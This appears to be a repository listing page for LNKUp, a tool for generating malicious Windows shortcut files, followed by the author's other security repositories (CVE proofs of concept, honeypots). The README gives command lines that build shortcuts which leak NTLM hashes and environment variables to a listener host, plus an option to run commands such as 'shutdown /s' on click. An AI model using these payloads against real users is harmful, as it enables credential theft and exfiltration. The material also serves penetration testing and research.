Plazmaz/LNKUp

Stars
249
Rank 162,050 (Top 4 %)
Language
Python
Created about 7 years ago
Updated over 1 year ago

Plazmaz/LNKUp

Plazmaz

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Generates malicious LNK file payloads for data exfiltration

LNKUp

LNK Data exfiltration payload generator

This tool will allow you to generate LNK payloads. Upon rendering or being run, they will exfiltrate data.

Info

I am not responsible for any actions you take with this tool!
You can contact me with any questions by opening an issue, or via my Twitter, @Plazmaz.

Known gotchas

This tool will not work on OSX or Linux machines. It is specifically designed to target windows.
There may be issues with icon caching in some situations. If your payload doesn't execute after the first time, try regenerating it.
You will need to run a responder or metasploit module server to capture NTLM hashes.
To capture environment variables, you'll need to run a webserver like apache, nginx, or even just this

Installation

Install requirements using
pip install -r requirements.txt

Usage

Payload types:

NTLM
- Steals the user's NTLM hash when rendered.
- Needs listener server such as this metasploit module
- More on NTLM hashes leaking: https://dylankatz.com/NTLM-Hashes-Microsoft's-Ancient-Design-Flaw/
- Example usage:
  lnkup.py --host localhost --type ntlm --output out.lnk
Environment
- Steals the user's environment variables.
- Examples: %PATH%, %USERNAME%, etc
- Requires variables to be set using --vars
- Example usage:
  lnkup.py --host localhost --type environment --vars PATH USERNAME JAVA_HOME --output out.lnk

Extra:

Use --execute to specify a command to run when the shortcut is double clicked
- Example:
  lnkup.py --host localhost --type ntlm --output out.lnk --execute "shutdown /s"

leaky-repo

Benchmarking repo for secrets scanning

MongoDB-HoneyProxy

A honeypot proxy for mongodb. When run, this will proxy and log all traffic to a dummy mongodb server.

Duckuino

A basic Duckyscript to Arduino converter

CVE-2019-18634

A functional exploit for CVE-2019-18634, a BSS overflow in sudo's pwfeedback feature that allows for for privesc

JSBN

An experimental implementation of a bot client which interprets commands through Twitter, thus requiring no hosting of servers from the command issuer

LiquidHoney

A small, fluid, low-interaction honeypot

Agent7

An open source penetration testing tool

CapeGiver

ProtocolLib is required! A proof of concept for an exploit in recent all Minecraft versions that allows servers to give users capes.

GHScraper

A tool for gathering potentially sensitive data from github's public stream

every-chrome-extension

Collect ALL the crx files

CVEStack

Scan products in your stack for known vulnerabilities

ShortStats

An OSINT/data gathering tool for extracting details from shortened bitlinks

Twitter-Bots-List

A list of accounts that auto-retweet or like certain keywords

awful-gitposts

💩 Bad memes and shitposts

bluekeep-pcap

Capture of Metaploit BlueKeep <--> OpenCanary

CVE-2020-1350-poc

A basic proof of concept for CVE-2020-1350

wsl-dotfiles

My dotfiles for Bash on Windows/Windows Subsytem for Linux

JHoneypot

A simple java SSH Honeypot

HoneyMesh

A centralized honeypot logging system for nodejs

FileJuice

basic-python-skeleton

Because I've typed this way too many times

dotfiles

My dotfiles. Very minimalist at the moment.

DiscordUI

Provides reaction-based UI components for using with Discord

unlock-hero

threat-actor-names

Providing valuable information on the latest threat actors before they even exist

go-home

Research into Go's default random.Source PRNG

GitRacoon

terminal-profiles

My personal profiles for Windows Terminal

PRFuzzer

Really stupid simple BitBucket PR fuzzing. Probably won't work for anyone else, not actively maintained.

Neuroticz

A basic webpage summarizing framework